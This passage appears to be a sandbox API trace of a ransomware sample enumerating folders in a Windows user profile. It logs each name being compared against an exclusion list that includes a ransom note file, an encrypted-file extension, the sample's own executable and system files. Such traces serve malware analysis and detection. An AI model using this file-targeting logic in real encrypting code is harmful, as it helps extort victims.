(lpString1="Outlook", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="Rabbit4444.exe") returned -1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2=".") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="..") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="windows") returned -1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="bootmgr") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="pagefile.sys") returned -1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="boot") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="ids.txt") returned 1 [0052.316] lstrcmpiW (lpString1="Outlook", lpString2="NTUSER.DAT") returned 1 [0052.316] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Outlook" | out: lpString1="Outlook") returned="Outlook" [0052.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x10a2f0 [0052.316] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0052.316] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x1b00229f, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="Rabbit4444.exe") returned -1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2=".") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="..") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="windows") returned -1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="bootmgr") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="pagefile.sys") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="boot") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="ids.txt") returned 1 [0052.316] lstrcmpiW (lpString1="PowerPoint", lpString2="NTUSER.DAT") returned 1 [0052.316] lstrcpyW (in: lpString1=0x130eb8c, lpString2="PowerPoint" | out: lpString1="PowerPoint") returned="PowerPoint" [0052.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120710 [0052.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117608 [0052.316] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120718 | out: ListHead=0xf68b0, ListEntry=0x120718) returned 0xea710 [0052.316] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x6f58c1c, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2="Rabbit4444.exe") returned -1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2=".") returned 1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2="..") returned 1 [0052.316] lstrcmpiW (lpString1="Proof", lpString2="windows") returned -1 [0052.317] lstrcmpiW (lpString1="Proof", lpString2="bootmgr") returned 1 [0052.317] lstrcmpiW (lpString1="Proof", lpString2="pagefile.sys") returned 1 [0052.317] lstrcmpiW (lpString1="Proof", lpString2="boot") returned 1 [0052.317] lstrcmpiW (lpString1="Proof", lpString2="ids.txt") returned 1 [0052.317] lstrcmpiW (lpString1="Proof", lpString2="NTUSER.DAT") returned 1 [0052.317] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Proof" | out: lpString1="Proof") returned="Proof" [0052.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120810 [0052.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x60) returned 0x11cb90 [0052.317] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120818 | out: ListHead=0xf68b0, ListEntry=0x120818) returned 0x120718 [0052.317] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b7903de, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="Rabbit4444.exe") returned -1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2=".") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="..") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="windows") returned -1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="bootmgr") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="pagefile.sys") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="boot") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="ids.txt") returned 1 [0052.317] lstrcmpiW (lpString1="Protect", lpString2="NTUSER.DAT") returned 1 [0052.317] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Protect" | out: lpString1="Protect") returned="Protect" [0052.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1204b0 [0052.317] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x64) returned 0x103f58 [0052.317] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1204b8 | out: ListHead=0xf68b0, ListEntry=0x1204b8) returned 0x120818 [0052.317] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x422eea37, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="Rabbit4444.exe") returned -1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2=".") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="..") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="windows") returned -1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="bootmgr") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="pagefile.sys") returned 1 [0052.317] lstrcmpiW (lpString1="Publisher", lpString2="boot") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher", lpString2="ids.txt") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher", lpString2="NTUSER.DAT") returned 1 [0052.318] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Publisher" | out: lpString1="Publisher") returned="Publisher" [0052.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120570 [0052.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x68) returned 0xef950 [0052.318] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120578 | out: ListHead=0xf68b0, ListEntry=0x120578) returned 0x1204b8 [0052.318] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Rabbit4444.exe") returned -1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="windows") returned -1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="bootmgr") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="pagefile.sys") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="boot") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="ids.txt") returned 1 [0052.318] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="NTUSER.DAT") returned 1 [0052.318] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Publisher Building Blocks" | out: lpString1="Publisher Building Blocks") returned="Publisher Building Blocks" [0052.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120490 [0052.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x88) returned 0x1064b0 [0052.318] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120498 | out: ListHead=0xf68b0, ListEntry=0x120498) returned 0x120578 [0052.318] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38fae20, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Signatures", cAlternateFileName="SIGNAT~1")) returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="Rabbit4444.exe") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2=".") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="..") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="windows") returned -1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="bootmgr") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="pagefile.sys") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="boot") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="ids.txt") returned 1 [0052.318] lstrcmpiW (lpString1="Signatures", lpString2="NTUSER.DAT") returned 1 [0052.318] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Signatures" | out: lpString1="Signatures") returned="Signatures" [0052.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120590 [0052.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x1176f8 [0052.319] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120598 | out: ListHead=0xf68b0, ListEntry=0x120598) returned 0x120498 [0052.319] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="Rabbit4444.exe") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2=".") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="..") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="windows") returned -1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="bootmgr") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="pagefile.sys") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="boot") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="ids.txt") returned 1 [0052.319] lstrcmpiW (lpString1="Speech", lpString2="NTUSER.DAT") returned 1 [0052.319] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Speech" | out: lpString1="Speech") returned="Speech" [0052.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120610 [0052.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xef9c0 [0052.319] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120618 | out: ListHead=0xf68b0, ListEntry=0x120618) returned 0x120598 [0052.319] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38d4b92, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="Rabbit4444.exe") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2=".") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="..") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="windows") returned -1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="bootmgr") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="pagefile.sys") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="boot") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="ids.txt") returned 1 [0052.319] lstrcmpiW (lpString1="Stationery", lpString2="NTUSER.DAT") returned 1 [0052.319] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0052.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1204d0 [0052.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x1178d8 [0052.319] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1204d8 | out: ListHead=0xf68b0, ListEntry=0x1204d8) returned 0x120618 [0052.319] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab505145, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0052.319] lstrcmpiW (lpString1="SystemCertificates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.319] lstrcmpiW (lpString1="SystemCertificates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="Rabbit4444.exe") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="windows") returned -1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="bootmgr") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="pagefile.sys") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="boot") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="ids.txt") returned 1 [0052.320] lstrcmpiW (lpString1="SystemCertificates", lpString2="NTUSER.DAT") returned 1 [0052.320] lstrcpyW (in: lpString1=0x130eb8c, lpString2="SystemCertificates" | out: lpString1="SystemCertificates") returned="SystemCertificates" [0052.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120530 [0052.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7a) returned 0x101af0 [0052.320] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120538 | out: ListHead=0xf68b0, ListEntry=0x120538) returned 0x1204d8 [0052.320] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xe3719c0d, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xf50bbe18, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="Rabbit4444.exe") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0052.320] lstrcmpiW (lpString1="Templates", lpString2="NTUSER.DAT") returned 1 [0052.320] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0052.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1207b0 [0052.320] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x68) returned 0xefd18 [0052.320] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1207b8 | out: ListHead=0xf68b0, ListEntry=0x1207b8) returned 0x120538 [0052.320] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0052.320] lstrcmpiW (lpString1="UProof", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.320] lstrcmpiW (lpString1="UProof", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.320] lstrcmpiW (lpString1="UProof", lpString2="Rabbit4444.exe") returned 1 [0052.320] lstrcmpiW (lpString1="UProof", lpString2=".") returned 1 [0052.320] lstrcmpiW (lpString1="UProof", lpString2="..") returned 1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="windows") returned -1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="bootmgr") returned 1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="pagefile.sys") returned 1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="boot") returned 1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="ids.txt") returned 1 [0052.321] lstrcmpiW (lpString1="UProof", lpString2="NTUSER.DAT") returned 1 [0052.321] lstrcpyW (in: lpString1=0x130eb8c, lpString2="UProof" | out: lpString1="UProof") returned="UProof" [0052.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1204f0 [0052.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xefd88 [0052.321] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1204f8 | out: ListHead=0xf68b0, ListEntry=0x1204f8) returned 0x1207b8 [0052.321] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="Rabbit4444.exe") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2=".") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="..") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="windows") returned -1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="bootmgr") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="pagefile.sys") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="boot") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="ids.txt") returned 1 [0052.321] lstrcmpiW (lpString1="Vault", lpString2="NTUSER.DAT") returned 1 [0052.321] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Vault" | out: lpString1="Vault") returned="Vault" [0052.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120790 [0052.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x60) returned 0x11cbf8 [0052.321] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120798 | out: ListHead=0xf68b0, ListEntry=0x120798) returned 0x1204f8 [0052.321] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd65f9933, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xd65f9933, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2="Rabbit4444.exe") returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0052.321] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0052.321] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0052.321] lstrcmpiW (lpString1="Word", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.321] lstrcmpiW (lpString1="Word", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="Rabbit4444.exe") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2=".") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="..") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="windows") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="bootmgr") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="pagefile.sys") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="boot") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="ids.txt") returned 1 [0052.322] lstrcmpiW (lpString1="Word", lpString2="NTUSER.DAT") returned 1 [0052.322] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Word" | out: lpString1="Word") returned="Word" [0052.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1205b0 [0052.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x5e) returned 0x11ca58 [0052.322] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1205b8 | out: ListHead=0xf68b0, ListEntry=0x1205b8) returned 0x120798 [0052.322] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, 